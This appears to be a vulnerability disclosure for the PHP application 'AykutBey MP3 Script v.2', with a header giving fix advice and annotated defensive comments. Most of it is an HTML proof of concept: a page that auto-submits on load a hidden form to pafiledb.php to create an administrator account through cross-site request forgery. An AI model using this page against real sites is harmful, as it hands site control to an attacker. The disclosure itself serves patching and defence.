< ------------------- header data start ------------------- >

#############################################################

# Application Name : AykutBey MP3 Script v.2

# Vulnerability Type : XSRF (Cross-Site Request Forgery, CSRF)

# Impact : Uzaktan otomatik olarak admin haklarina sahip kullanici eklenebilir. (A user with administrator rights can be added remotely and automatically.)

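# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir. (A session token should be added to the form; the server must also verify it on every state-changing request, otherwise the token gives no protection.)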

# author : Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<!-- Proof of concept for the XSRF (CSRF) issue named in the header above.
     The onLoad handler calls Submit(), which submits the form named Sh0cK,
     so the POST is sent as soon as the page loads, without a click. -->
<bOdy onLoad=Submit();>
<script>function Submit(){document.Sh0cK.submit();}</script>

<!-- The form POSTs to pafiledb.php; www.Site.com and [Path] are placeholders.
     None of the fields below carries a session or anti-CSRF token.
     NOTE(review): the request is presumably authorised only by the session
     cookie the browser attaches automatically; confirm against the application.
     Defensive view: the admin handler should require an unpredictable
     per-session token and reject requests without it. SameSite cookies and an
     Origin/Referer check are additional layers, not a replacement.
     Detection: admin-action POSTs whose Origin or Referer is not the
     application's own site are worth alerting on. -->
<form action=http://www.Site.com/[Path]/pafiledb.php name=Sh0cK method=post>
<!-- form[username], form[email] and form[password] carry placeholder values
     (Turkish: Kullaniciadi = username, Sifre = password). -->
<input type=text size=50 name=form[username] class=forminput value=Kullaniciadi>
<input type=text size=50 name=form[email] class=forminput value=Mail>
<input type=text size=50 name=form[password] class=forminput value=Sifre>
<!-- Both options have value=1, so form[status] is submitted as 1 whichever
     label (Hayir = No, Evet = Yes) is selected. -->
<select name=form[status] class=forminput><option value=1 selected>Hayir</option><option value=1>Evet</option></select>
<!-- Hidden fields: action=admin, ad=admins, admins=add, add=do.
     NOTE(review): these presumably select the "add administrator" handler in
     pafiledb.php; verify against the application source.
     The last hidden input tag is split across lines in the original listing.
     The submit button label is Turkish for "Please wait." -->
<input type=hidden name=action value=admin><input type=hidden name=ad value=admins><input type=hidden name=admins value=add><input type=hidden

name=add value=do><input type=submit value=Lütfen Bekleyiniz.></form>

< -- bug code end of -- >